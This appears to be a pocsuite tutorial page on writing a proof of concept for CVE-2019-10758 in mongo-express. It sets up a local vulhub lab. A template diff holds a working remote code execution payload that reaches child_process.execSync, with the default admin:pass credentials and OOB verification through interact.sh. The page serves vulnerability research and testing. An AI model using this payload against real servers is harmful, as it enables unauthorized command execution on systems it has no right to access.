Mongo-express Authentication Remote Code Execution Vulnerability (CVE-2019-10758)

Vulnerability details: mongo-express Remote Code Execution Vulnerability (CVE-2019-10758)

Mongo-express is a web-based MongoDB admin interface written in Node.js, Express.js, and Bootstrap3.

Mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment. If the attacker can successfully log in, or the target server has not changed the default account password (admin:pass), then arbitrary node.js code can be executed.

PoC development

Use pocsuite --new to generate the template. Since this is an OOB vulnerability, we use OOB interaction services such as CEye or Interactsh to assist verification.

TIP

The Out-of-Band vulnerabilities, also known as OOB, are a series of alternative ways that an attacker uses to exploit a vulnerability that can’t be detected by a traditional HTTP request-response interaction.

Interactsh is an open-source tool for detecting out-of-band interactions. It developed by projectdiscovery, a well-known open source software organization. As long as you have a domain, you can quickly build your own oob service. There are also some publicly available, such as: interact.sh, oast.pro, oast.live, oast.site, oast.online, oast.fun, oast.me.

Generate template.

➜ pocsuite --new
...
-----
Seebug ssvid (eg, 99335) [0]: 98116
PoC author (eg, Seebug) []: Seebug
Vulnerability disclosure date (eg, 2021-8-18) [2022-7-11]: 2020-01-03
Advisory URL (eg, https://www.seebug.org/vuldb/ssvid-99335) [https://www.seebug.org/vuldb/ssvid-98116]:
Vulnerability CVE number (eg, CVE-2021-22123) []: CVE-2019-10758
Vendor name (eg, Fortinet) []:
Product or component name (eg, FortiWeb) []: mongo-express
Affected version (eg, <=6.4.0) []: <=0.53.0
Vendor homepage (eg, https://www.fortinet.com) []: https://github.com/mongo-express/mongo-express

0    Arbitrary File Read
1    Code Execution
2    Command Execution
3    Denial Of service
4    Information Disclosure
5    Login Bypass
6    Path Traversal
7    SQL Injection
8    SSRF
9    XSS

Vulnerability type, choose from above or provide (eg, 3) []: 1
Authentication Required (eg, yes) [no]: yes  # Auth required
Can we get result of command (eg, yes) [no]: no  # Out-of-Band vulnerabilities
Out-of-band server to use (eg, interactsh) [ceye]: interactsh
...

Simply modify the template according to the details of the vulnerability.

     def _options(self):
         o = OrderedDict()
-        o['user'] = OptString('', description='The username to authenticate as', require=True)
-        o['pwd'] = OptString('', description='The password for the username', require=True)
+        o['user'] = OptString('admin', description='The username to authenticate as', require=True)
+        o['pwd'] = OptString('pass', description='The password for the username', require=True)
         o['cmd'] = OptString('uname -a', description='The command to execute')
         return o

     def _exploit(self, param=''):
-        if not self._check(dork=''):
+        if not self._check(dork='mongo-express='):
             return False

         user = self.get_option('user')
         pwd = self.get_option('pwd')
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
-        payload = 'a=b'
-        res = requests.post(self.url, headers=headers, data=payload)
+        payload = (
+            'document=this.constructor.constructor("return process")().'
+            f'mainModule.require("child_process").execSync("{param}")'
+        )
+        res = requests.post(f'{self.url}/checkValid', headers=headers, data=payload, auth=(user, pwd))
         logger.debug(res.text)
         return res.text

Preparing the vulnerable environment

Create a vulnerability environment using vulhub.

┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/vulhub/vulhub.git && cd vulhub/mongo-express/CVE-2019-10758 && docker-compose up -d
Cloning into 'vulhub'...
remote: Enumerating objects: 12574, done.
remote: Total 12574 (delta 0), reused 0 (delta 0), pack-reused 12574
Receiving objects: 100% (12574/12574), 139.45 MiB | 1015.00 KiB/s, done.
Resolving deltas: 100% (5003/5003), done.
Creating network "cve-2019-10758_default" with the default driver
Creating cve-2019-10758_mongo_1 ... done
Creating cve-2019-10758_web_1   ... done
                                                                                                                                                                                 
┌──(kali㉿kali)-[/tmp/vulhub/mongo-express/CVE-2019-10758]
└─$ curl -I localhost:8081
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 8199
ETag: W/"2007-KWtm8qZk7ZuiLlUF3uCj0lng5+Q"
Set-Cookie: mongo-express=s%3AaKAompVZQO7rTWLcDL0RqFa1FMt-ufPd.PTqXL2A%2BZm8I6o%2BT6Jz1xNLDTbbsJi1IS%2BmouRgrJns; Path=/; HttpOnly
Date: Thu, 14 Jul 2022 23:01:01 GMT
Connection: keep-alive

Vulnerability verification

Through the command line parameter --user admin --pwd pass --oob-server interact.sh specifies the user name, password, and OOB service to be used. If not provided, the default value will be used.

Mongo-express Authentication Remote Code Execution Vulnerability (CVE-2019-10758) #

PoC development #

Preparing the vulnerable environment #

Vulnerability verification #

Mongo-express Authentication Remote Code Execution Vulnerability (CVE-2019-10758)

PoC development

Preparing the vulnerable environment

Vulnerability verification